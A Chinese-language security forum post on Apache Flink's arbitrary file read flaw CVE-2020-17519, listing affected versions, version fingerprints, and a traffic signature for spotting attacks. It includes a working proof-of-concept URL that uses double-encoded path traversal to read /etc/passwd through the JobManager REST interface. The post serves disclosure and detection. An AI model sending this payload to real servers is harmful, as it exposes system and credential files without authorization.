apache Fink 任意文件读取漏洞(CVE-2020-17519)

13587947005   ·   发表于 2022-08-04 09:58:48   ·   漏洞文章

漏洞描述:Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
攻击者可利用JobManager进程的REST接口读取JobManager本地文件系统上文件。
漏洞影响:
apache Flink 1.11.0 1.11.1 1.11.2版本
静态特征码:
Apache Flink Web Dashboard

在HTML源码中找到此版本独有的特征
动态特征:
GET /runtime.0dcf16aad31edd73d8e8.js
在流量中找到此版本独有的特征

漏洞复现:
验证POC
http://HOST/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

在响应数据里显示root:x:证明漏洞存在
验证是否被攻击
识别:GET /jobmanager/logs/..%252f..%252f
在流量中抓取到

识别2

用户名金币积分时间理由
Track-劲夫 30.00 0 2022-08-05 11:11:05 一个受益终生的帖子~~

打赏我,让我更有动力~

1 条回复   |  直到 2022-8-5 | 911 次浏览

13587947005
发表于 2022-8-5

哇,第一次

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.